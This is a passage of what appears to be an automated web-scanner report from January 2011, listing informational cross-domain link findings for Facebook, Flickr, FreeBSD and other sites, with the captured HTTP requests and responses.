...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs338.snc4/41764_636357773_2357_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=610855543" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs428.ash2/70773_610855543_7232558_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=645665173" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1286.snc4/173673_645665173_8179808_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001950285846" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1431.snc4/173257_100001950285846_2393096_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001522669503" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs717.ash1/161419_100001522669503_929421_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1046656972" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs442.snc4/48824_1046656972_2377091_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=851905474" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1283.snc4/173433_851905474_6150531_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/abid.bahloul" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs721.ash1/161740_1486010960_4789113_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001476439731" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/161499_100001476439731_1362142_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=674455524" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs714.ash1/161267_674455524_3070011_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001903179424" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1290.snc4/173816_100001903179424_3289462_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://e.static.ak.fbcdn.net/rsrc.php/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

20.577. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/profile.php?id=836605415
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
  • http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css
  • http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yP/r/8xr7FhyZNob.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/ys/r/Fheu4ksYYAS.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://f.static.ak.fbcdn.net/rsrc.php/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...

20.578. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/sharer.php?u=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css
  • http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico
  • http://e.static.ak.fbcdn.net/rsrc.php/y8/r/-lJYufDodnZ.css
  • http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css
  • http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js
  • http://static.ak.fbcdn.net/rsrc.php/y_/r/1wbaEwMBrY2.css
  • http://static.ak.fbcdn.net/rsrc.php/yo/r/0kM-ICNiT22.css

Request

GET /sharer.php?u= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=vMrhe; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:31 GMT
Content-Length: 10912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/uGWXuz9yS_L.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y_/r/1wbaEwMBrY2.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yo/r/0kM-ICNiT22.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/yR/r/3ltOPQgcfkx.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/y8/r/-lJYufDodnZ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/y5/r/yW_a5GkHW4g.ico" /></head>
...[SNIP]...

20.579. http://www.fiction.net/blong/programs/#aub/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiction.net
Path:   /blong/programs/#aub/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.fiction.net/blong/programs/#aub/x26amp;rct\\x3dj\\x26amp;q\\x3daub+assemble+usenet+\\x26amp;usg\\x3dAFQjCNH6sOd0x37wAZZbuOSPjUuRZxyWxA\\x26amp;sa\\x3dX\\x26amp;ei\\x3dkZI9Ta-vH8P68AayusHTCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCEQygQ\\x22\\x3e\\x3cem\\x3eaub\\x3c/em\\x3e
The response contains the following links to other domains:
  • http://encap.cso.uiuc.edu/
  • http://encap.cso.uiuc.edu/epkg/
  • http://hoohoo.ncsa.uiuc.edu/
  • http://hoohoo.ncsa.uiuc.edu/archie/
  • http://shire.ncsa.uiuc.edu/
  • http://terra.igcom.net/~jeske/s3mod.html
  • http://www.ais.net/dmarks/
  • http://www.clearsilver.net/
  • http://www.debian.org/Packages/unstable/text/catdoc.html
  • http://www.ece.uiuc.edu/~ece291/
  • http://www.geek-girl.com/bugtraq/1995_3/0217.html
  • http://www.google-analytics.com/urchin.js
  • http://www.ice.ru/~vitus/catdoc/index.html
  • http://www.uiuc.edu/ph/www/jeske
  • http://www.uiuc.edu/ph/www/roth
  • http://www.uiuc.edu/ph/www/swetland

Request

GET /blong/programs/#aub/x26amp;rct\\x3dj\\x26amp;q\\x3daub+assemble+usenet+\\x26amp;usg\\x3dAFQjCNH6sOd0x37wAZZbuOSPjUuRZxyWxA\\x26amp;sa\\x3dX\\x26amp;ei\\x3dkZI9Ta-vH8P68AayusHTCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CCEQygQ\\x22\\x3e\\x3cem\\x3eaub\\x3c/em\\x3e HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:14 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14165

<HTML>
<HEAD>
<TITLE>Brandon's Program Archive</TITLE>
</HEAD>
<BODY BGCOLOR=#ffffff>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javas
...[SNIP]...
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a class=hlink href="http://www.clearsilver.net/">ClearSilver</a>
...[SNIP]...
<LI><a href="http://www.clearsilver.net/">ClearSilver</a>
...[SNIP]...
</A>
Written by <a href="http://www.uiuc.edu/ph/www/swetland">Brian Swetland</A>,
this is a C program to create the link tree for a new program in an encap
distribution. For more information, see <a href="http://www.uiuc.edu/ph/www/roth">Mark Roth's</a> encap package manager,
<a href="http://encap.cso.uiuc.edu/epkg/">epkg</a>, and a whole lot of
information on it <a href="http://encap.cso.uiuc.edu/">here</a>
...[SNIP]...
</A>
Another program originally written by
<a href="http://www.uiuc.edu/ph/www/swetland">Brian Swetland</A>
...[SNIP]...
es to allow header editing, etc.
Webgrab is a command line browser, and is quite useful for testing servers
and writing scripts to snarf web content. The current version of webgrab is
also part of the <a href="http://hoohoo.ncsa.uiuc.edu/">NCSA HTTPd 1.5.x</a>
...[SNIP]...
</A>
This program was initially written by
<a href="http://shire.ncsa.uiuc.edu/">Scott Powers</a>
...[SNIP]...
rl script which I wrote to replace a shell script version. It
interfaces with the Un*x C-Archie command-line archie query program, and
creates a hyper-linked response in HTML. It can be seen in action
<a href="http://hoohoo.ncsa.uiuc.edu/archie/">here</a>
...[SNIP]...
</A>
This was a program that originated as an x86 assembly project for
<a href="http://www.ece.uiuc.edu/~ece291/">ECE 291</a> by my roommates
<a href="http://www.uiuc.edu/ph/www/jeske">David Jeske</a> and
<a href="http://www.ais.net/dmarks/">Dan Marks</a>
...[SNIP]...
A for the course. I decided to port it to Linux on a whim, and
they took over from there. Since then, I've helped with various issues,
including the reorganization of the most recent versions. See the
<a href="http://terra.igcom.net/~jeske/s3mod.html">S3Mod Home Page</a>
...[SNIP]...
</A> -
<A href="http://www.geek-girl.com/bugtraq/1995_3/0217.html">Original</A>
...[SNIP]...
</A>
Yes, this is for MS Word .doc files. Someone pointed out a
<a
href="http://www.debian.org/Packages/unstable/text/catdoc.html">
debian
package</a>
...[SNIP]...
e or paragraph of
pure text. The author has rewritten this from scratch, and the new
version can handle more Word files and also includes an Excel data
extractor. The homepage for this tool is located <a
href="http://www.ice.ru/~vitus/catdoc/index.html">
here</a>
...[SNIP]...

20.580. http://www.filewatcher.com/_/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /_/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.filewatcher.com/_/?p=2&pd=1&pt=2&q=aub%5B-_.%5D*
The response contains the following links to other domains:
  • http://www.ftp-sites.org/
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
  • http://www.maruhn.com/

Request

GET /_/?p=2&pd=1&pt=2&q=aub%5B-_.%5D* HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MIIdMmV74Eobe+Cc/gz2Dw"
Content-Length: 34425
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub[-_.]* - FTP File Search</tit
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</a> - <a href="http://www.ftp-sites.org/" title="Regularly updated list of 5000+ anonymous FTP sites">FTP Sites List</a>
...[SNIP]...
<br />&copy; 1997-2010 <a href="http://www.maruhn.com/">MARUHN IT Consulting</a>
...[SNIP]...

20.581. http://www.flickr.com/badge_code_v2.gne

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05
The response contains the following link to another domain:
  • http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us

Request

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:44:59 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:44:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www45.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge
   
   
                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=d1dfc89598702b40d584f63b47ad0017&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

20.582. http://www.flickr.com/badge_code_v2.gne

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /badge_code_v2.gne

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.flickr.com/badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05
The response contains the following link to another domain:
  • http://geo.yahoo.com/p?s=792600102&t=a7e7ea58c2d3e173c6897cecfedb6194&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us

Request

GET /badge_code_v2.gne?count=6&display=latest&size=s&layout=x&source=user&user=27539554%40N05 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://blog.tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:21:25 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:21:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www111.flickr.mud.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 2168

var b_txt = '';

// write the badge
   
   
                       b_txt+= '<div class="flickr_badge_image" id="flickr_badge_image1"><a href="http://www.flickr.com/photos/favoritltd/4795392811/"><img src="http://farm5.
...[SNIP]...
<span style="position:absolute;left:-999em;top:-999em;visibility:hidden" class="flickr_badge_beacon"><img src="http://geo.yahoo.com/p?s=792600102&t=a7e7ea58c2d3e173c6897cecfedb6194&r=http%3A%2F%2Fblog.tweetmeme.com%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></span>
...[SNIP]...

20.583. http://www.freebsd.org/cgi/pds.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/pds.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/pds.cgi?ports/mail/adcomplain
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/pds.cgi?ports/mail/adcomplain HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>FreeBSD Ports downlo
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...

20.584. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/nntpcache/pkg-descr
The response contains the following links to other domains:
  • http://iq.org/~proff/nntpcache.org/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www.nocem.org/

Request

GET /cgi/url.cgi?ports/news/nntpcache/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
e multiple servers, (permiting local newsgroups with remote
NNTP feeds), filter articles, xovers, and headers based on weighted
regular expressions, and has built in NoCem/PGP (anti-spam) support
(see <A HREF="http://www.nocem.org/">http://www.nocem.org/</A> for details).

WWW: <A HREF="http://iq.org/~proff/nntpcache.org/">http://iq.org/~proff/nntpcache.org/</A>
...[SNIP]...

20.585. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/leafnode+/pkg-descr
The response contains the following links to other domains:
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/
  • http://www25.big.jp/~jam/leafnode+/

Request

GET /cgi/url.cgi?ports/news/leafnode+/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:56 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
node.

NOTE: This software contains a number of data-loss bugs and does not
appear to be actively maintained. For new installations, the
news/leafnode port is likely to serve your needs better.

WWW: <A HREF="http://www25.big.jp/~jam/leafnode+/">http://www25.big.jp/~jam/leafnode+/</A>
...[SNIP]...

20.586. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/www/mozex/pkg-descr
The response contains the following links to other domains:
  • http://mozex.mozdev.org/index.html
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/mozex/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
ctions:

* view page source
* edit content of textareas (possibly utilizing a spell-checker in the
text editor)
* handle mailto, news, telnet and FTP links
* download files

WWW: <A HREF="http://mozex.mozdev.org/index.html">http://mozex.mozdev.org/index.html</A>
...[SNIP]...

20.587. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/www/p5-Apache-NNTPGateway/pkg-descr
The response contains the following links to other domains:
  • http://search.cpan.org/dist/Apache-NNTPGateway/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

GET /cgi/url.cgi?ports/www/p5-Apache-NNTPGateway/pkg-descr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:37:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 6498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>Port description for
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/">Foundation</a>
...[SNIP]...
<li><a href="http://www.freebsdfoundation.org/donate/">Donate</a>
...[SNIP]...
<pre>
Apache::NNTPGateway - a NNTP interface for mod_perl enabled Apache web
server.

WWW: <A HREF="http://search.cpan.org/dist/Apache-NNTPGateway/">http://search.cpan.org/dist/Apache-NNTPGateway/</A>
...[SNIP]...

20.588. http://www.freebsd.org/cgi/url.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/url.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.freebsd.org/cgi/url.cgi?ports/news/slrn/pkg-descr
The response contains the following links to other domains:
  • http://slrn.sourceforge.net/
  • http://www.freebsdfoundation.org/
  • http://www.freebsdfoundation.org/donate/

Request

